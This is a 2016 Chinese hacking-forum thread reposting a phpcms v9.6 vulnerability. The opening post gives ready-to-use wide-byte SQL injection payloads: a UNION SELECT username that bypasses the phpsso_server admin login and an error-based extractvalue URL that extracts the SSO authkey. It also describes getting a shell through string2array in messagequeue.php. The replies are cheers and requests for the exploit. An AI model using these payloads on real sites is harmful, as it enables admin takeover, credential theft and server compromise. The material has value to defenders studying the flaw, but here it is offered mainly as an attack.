查看: 56785|回复: 70

phpcmsV9.6 getshell

  [复制链接]
发表于 2016-3-22 12:32:11 | 显示全部楼层 |阅读模式
这个漏洞来自乌云,经过本地环境测试后,发现漏洞确实存在。
04BE0B32-4E00-4784-A590-8CEA686DBE40.png
3C0A11A8B9F2F76BB824739CC329C9A5.jpg

详细说明:
PHP双字节编码,这个本不应该出现的问题,或许因为过去太久远快被遗忘了,phpcms从20140929的v9.5.9版本起,增加了mysqli的支持,因为编写疏忽,导致该问题又重现江湖。漏洞本身无需细说。phpcms默认使用mysqli数据库,显示mysql语句错误(debug为true,呵呵完全可以爆错注入),而且安装过程不能修改。
漏洞影响:利用20140929的v9.5.9以后版本新建站点,以前版本升级的不受影响,故自评Rank为15

漏洞危害:利用漏洞直接登陆phpsso_server后台获取shell、注入等。

1、登陆登陆phpsso_server后台

code 区域
用户名:
[PHP] 纯文本查看 复制代码
誠' union select 1,0x706870636D73,0x3831346539303966363566316439313263646237636333393833623934333239,4,1,6,7 -- k


密码:1

21175433f7b248e43d8725b4c42a695f8bae4824.jpg

2、利用phpsso_server/phpcms/modules/admin/messagequeue.php页面的string2array函数获取shell。测试代码另存为html文件,登陆phpsso_server后,提交即可。测试时,请修改form的action属性。

3、注入。访问链接:
[PHP] 纯文本查看 复制代码
**.**.**.**/phpcmsv9/index.php?m=pay&c=respond&a=respond_get&code=kkk%89' and extractvalue(1, concat(0x7e, (select substr(authkey,1,30) FROM v9_sso_applications where appid=1),0x7e))--%20m

211744016a16a6842077a6909d982b304bde11ca.jpg
回复

使用道具 举报

发表于 2016-3-22 12:39:44 | 显示全部楼层
乌云那个路人甲是不是你
回复 支持 反对

使用道具 举报

发表于 2016-3-22 12:40:24 | 显示全部楼层
卧槽 这个吊
回复 支持 反对

使用道具 举报

发表于 2016-3-22 12:44:11 | 显示全部楼层
看看分享,,谢谢
回复 支持 反对

使用道具 举报

发表于 2016-3-22 12:53:27 | 显示全部楼层
日....这个666。乌云还没公布。不把权限设高点?
回复 支持 反对

使用道具 举报

发表于 2016-3-22 13:01:53 | 显示全部楼层
乌云还没公布?
回复 支持 反对

使用道具 举报

发表于 2016-3-22 13:04:52 | 显示全部楼层
坐等exp.......
回复 支持 反对

使用道具 举报

发表于 2016-3-22 13:13:34 | 显示全部楼层
赶紧本地搭建测试一下
回复 支持 反对

使用道具 举报

发表于 2016-3-22 13:13:40 | 显示全部楼层
真的出了啊,666
回复 支持 反对

使用道具 举报

发表于 2016-3-22 14:09:02 | 显示全部楼层
又放漏洞了,果断关注
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

旗下站点

邮箱系统

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2025-5-1 21:24 , Processed in 0.120880 second(s), 21 queries , Gzip On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部